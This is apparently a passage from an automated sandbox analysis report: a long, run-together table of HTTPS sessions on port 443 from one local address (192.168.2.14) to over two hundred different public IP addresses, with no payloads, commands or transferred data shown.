                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18969192.168.2.1452124205.96.127.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18970192.168.2.1450000160.247.127.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18971192.168.2.1447052186.148.65.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18972192.168.2.1443412200.205.102.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18973192.168.2.1458788212.200.118.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18974192.168.2.144922851.40.18.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18975192.168.2.1444294164.9.187.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18976192.168.2.1443258213.3.108.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18977192.168.2.145068271.159.209.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18978192.168.2.1451752128.194.81.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18979192.168.2.1457176221.10.22.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18980192.168.2.1452534132.199.110.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18981192.168.2.145137284.178.141.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18982192.168.2.1437034120.8.4.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18983192.168.2.1437208130.8.98.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18984192.168.2.145035460.5.76.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18985192.168.2.144065653.187.18.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18986192.168.2.1447994161.244.158.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18987192.168.2.14373624.254.57.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18988192.168.2.1436222159.28.103.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18989192.168.2.144252672.224.22.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18990192.168.2.1433154168.118.28.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18991192.168.2.1450174138.50.102.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18992192.168.2.1456052146.0.188.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18993192.168.2.144259877.202.89.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18994192.168.2.1436144107.213.166.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18995192.168.2.145585644.83.137.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18996192.168.2.1449512188.162.9.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18997192.168.2.14525602.154.186.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18998192.168.2.1450880186.237.52.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18999192.168.2.1454112144.9.73.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19000192.168.2.144014268.110.206.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19001192.168.2.1433050102.53.205.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19002192.168.2.144920864.153.200.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19003192.168.2.1439482197.215.41.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19004192.168.2.1433006213.120.46.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19005192.168.2.1442684163.94.188.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19006192.168.2.144382436.72.141.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19007192.168.2.1457322153.199.4.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19008192.168.2.1440342175.90.85.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19009192.168.2.1444452154.235.157.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19010192.168.2.143524049.185.102.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19011192.168.2.1459158162.236.248.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19012192.168.2.1452202120.120.173.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19013192.168.2.143626020.29.83.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19014192.168.2.1436746161.153.173.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19015192.168.2.145821288.39.158.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19016192.168.2.1450708195.204.150.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19017192.168.2.1452680182.160.60.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19018192.168.2.1438364196.120.132.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19019192.168.2.1457782188.224.155.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19020192.168.2.1449030212.120.83.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19021192.168.2.1451858101.26.16.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19022192.168.2.1459502108.84.142.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19023192.168.2.144346251.2.232.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19024192.168.2.1437408134.184.58.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19025192.168.2.1436476116.60.106.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19026192.168.2.145570286.13.47.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19027192.168.2.1437162147.110.23.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19028192.168.2.1433970187.145.111.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19029192.168.2.1434502125.94.43.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19030192.168.2.1451472177.70.199.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19031192.168.2.143561688.46.222.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19032192.168.2.1447776104.234.42.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19033192.168.2.143753659.243.149.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19034192.168.2.1436710174.243.136.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19035192.168.2.144584497.37.41.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19036192.168.2.143767049.231.97.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19037192.168.2.1442058180.236.96.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19038192.168.2.1443092117.139.202.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19039192.168.2.1450038133.180.51.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19040192.168.2.1459404159.193.27.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19041192.168.2.145433498.239.130.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19042192.168.2.1455840157.246.92.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19043192.168.2.144725827.142.209.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19044192.168.2.1439834196.208.32.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19045192.168.2.1444158164.134.126.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19046192.168.2.1433744103.119.146.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19047192.168.2.1446346132.234.158.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19048192.168.2.1459444124.45.2.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19049192.168.2.143431683.86.173.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19050192.168.2.144134647.179.110.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19051192.168.2.143700280.197.27.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19052192.168.2.145868859.81.196.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19053192.168.2.143631699.145.149.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19054192.168.2.144279851.241.71.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19055192.168.2.145293664.226.52.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19056192.168.2.1440808154.212.33.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19057192.168.2.1456070139.148.250.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19058192.168.2.1459050180.218.100.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19059192.168.2.145695823.108.91.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19060192.168.2.1452582199.131.221.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19061192.168.2.1449930205.210.106.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19062192.168.2.143660838.76.130.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19063192.168.2.145540645.198.77.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19064192.168.2.143696675.27.214.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19065192.168.2.1452892147.210.77.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19066192.168.2.144987231.94.194.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19067192.168.2.145007471.119.44.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19068192.168.2.1447652115.111.53.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19069192.168.2.1436456145.26.211.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19070192.168.2.144672064.76.3.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19071192.168.2.1458306162.20.214.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19072192.168.2.145597499.110.91.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19073192.168.2.1438612139.22.84.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19074192.168.2.1453634212.128.146.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19075192.168.2.1449154138.231.14.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19076192.168.2.1438976108.232.112.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19077192.168.2.1458316148.236.99.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19078192.168.2.143419452.211.56.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19079192.168.2.1457236220.245.248.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19080192.168.2.146019882.251.152.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19081192.168.2.144417257.72.213.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19082192.168.2.145911271.216.207.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19083192.168.2.1457774207.186.45.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19084192.168.2.1439936115.179.8.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19085192.168.2.1445342201.169.230.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19086192.168.2.1440720153.37.201.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19087192.168.2.1443696136.35.198.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19088192.168.2.1445950212.104.161.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19089192.168.2.144943491.31.161.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19090192.168.2.1449276176.220.59.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19091192.168.2.1448488146.7.228.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19092192.168.2.145110478.35.136.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19093192.168.2.1457816138.189.67.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19094192.168.2.1439650185.101.13.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19095192.168.2.1440932142.113.255.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19096192.168.2.144824032.219.240.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19097192.168.2.1448874169.123.221.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19098192.168.2.143487898.229.226.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19099192.168.2.1452986209.221.209.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19100192.168.2.1447230166.137.212.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19101192.168.2.1442472188.126.160.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19102192.168.2.1443754134.157.80.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19103192.168.2.144895431.17.82.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19104192.168.2.1458372183.171.56.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19105192.168.2.1456758199.254.218.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19106192.168.2.145504899.211.200.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19107192.168.2.144876453.212.181.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19108192.168.2.143643617.196.39.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19109192.168.2.1433520192.29.94.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19110192.168.2.145649444.234.71.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19111192.168.2.143896496.18.151.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19112192.168.2.1444958158.76.202.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19113192.168.2.1450350186.8.182.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19114192.168.2.143477052.168.247.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19115192.168.2.145323675.244.68.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19116192.168.2.143798092.109.217.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19117192.168.2.1449330194.249.51.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19118192.168.2.143414242.106.51.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19119192.168.2.145410012.90.155.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19120192.168.2.1444254198.52.41.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19121192.168.2.1453704108.241.119.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19122192.168.2.14607689.125.247.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19123192.168.2.1452682147.92.126.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19124192.168.2.145267231.146.36.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19125192.168.2.1439512219.110.211.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19126192.168.2.143855697.18.131.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19127192.168.2.1435844130.126.128.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19128192.168.2.146092257.179.93.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19129192.168.2.1441822160.133.119.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19130192.168.2.1459920188.125.129.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19131192.168.2.1457006205.248.168.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19132192.168.2.145346257.203.146.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19133192.168.2.1448666151.125.251.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19134192.168.2.1443908167.68.161.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19135192.168.2.1440308134.92.174.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19136192.168.2.144115093.83.166.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19137192.168.2.143649236.16.32.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19138192.168.2.1436434179.205.39.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19139192.168.2.1451090144.132.231.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19140192.168.2.143700284.231.27.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19141192.168.2.146037039.226.108.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19142192.168.2.1436944105.34.228.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19143192.168.2.145375837.70.51.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19144192.168.2.1446122125.156.96.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19145192.168.2.1438796105.148.142.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19146192.168.2.14461101.104.86.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19147192.168.2.1441286122.246.66.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19148192.168.2.1449200167.91.6.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19149192.168.2.1434354152.250.145.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19150192.168.2.1449510220.18.225.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19151192.168.2.144673447.95.190.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19152192.168.2.145959870.214.231.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19153192.168.2.1438706101.249.230.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19154192.168.2.145463840.186.124.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19155192.168.2.1435100206.195.34.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19156192.168.2.145748078.189.181.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19157192.168.2.1456502107.225.104.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19158192.168.2.145379482.125.25.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19159192.168.2.143778642.147.61.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19160192.168.2.1445966141.253.22.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19161192.168.2.145157296.83.87.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19162192.168.2.1444426200.69.92.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19163192.168.2.144176045.85.155.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19164192.168.2.1456018174.23.124.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19165192.168.2.1432896155.90.42.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19166192.168.2.143788820.224.190.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19167192.168.2.14489402.149.100.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19168192.168.2.1445772105.207.104.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19169192.168.2.1459724142.154.190.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19170192.168.2.1438668111.168.80.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19171192.168.2.1436302181.205.117.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19172192.168.2.1455324159.104.141.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19173192.168.2.1439784198.109.132.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19174192.168.2.144169843.86.36.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19175192.168.2.145508086.87.115.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19176192.168.2.143499460.216.142.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19177192.168.2.144648051.90.156.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19178192.168.2.145588612.141.252.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19179192.168.2.143633278.171.58.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19180192.168.2.145528845.240.220.159443
                                                      TimestampBytes transferredDirectionData


